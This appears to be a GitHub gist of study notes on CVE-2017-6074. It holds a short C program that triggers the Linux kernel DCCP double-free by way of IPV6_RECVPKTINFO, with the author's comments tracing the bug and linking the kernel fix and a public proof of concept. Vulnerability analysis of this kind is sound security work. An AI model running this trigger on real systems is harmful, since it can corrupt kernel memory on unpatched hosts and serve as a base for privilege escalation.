Created
June 7, 2020 07:27
-
-
Save f0rm2l1n/eb1fe399d457ffe802e9f221a42e7ec5 to your computer and use it in GitHub Desktop.
CVE-2017-6074 note
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| int main() { | |
| struct sockaddr_in6 sa1; | |
| sa1.sin6_family = AF_INET6; | |
| sa1.sin6_port = htons(20002); | |
| inet_pton(AF_INET6, "::1", &sa1.sin6_addr); | |
| sa1.sin6_flowinfo = 0; | |
| sa1.sin6_scope_id = 0; | |
| int optval = 8; | |
| int s1 = socket(PF_INET6, SOCK_DCCP, IPPROTO_IP); | |
| bind(s1, &sa1, 0x20); | |
| listen(s1, 0x9); | |
| setsockopt(s1, IPPROTO_IPV6, IPV6_RECVPKTINFO, &optval, 4); | |
| int s2 = socket(PF_INET6, SOCK_DCCP, IPPROTO_IP); | |
| connect(s2, &sa1, 0x20); /* | |
| * This connect will leads to dccp_rcv_state_process() and indirect call | |
| * to dccp_v6_conn_request() where `IPV6_RECVPKTINFO` can take effects. | |
| * That is to say skb->user will increase. | |
| * After the indirect call, `goto discard` is done and the first time free | |
| * will be completed. | |
| */ | |
| /* | |
| * From the linux patch (https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=5edabca9d4cff7f1f2b68f0bac55ef99d9798ba4) | |
| * I can be sure that this *double free bug* will happen next time somewhere free the already freed skb | |
| */ | |
| shutdown(s1, SHUT_RDWR); /* | |
| * Learn from the poc (https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-6074/poc.c) | |
| * This shutdown must leads to another kfree(skb). However, even with step-by-step debug, I cannot | |
| * found that :( | |
| */ | |
| close(s1); | |
| shutdown(s2, SHUT_RDWR); | |
| close(s2); | |
| return 0; | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment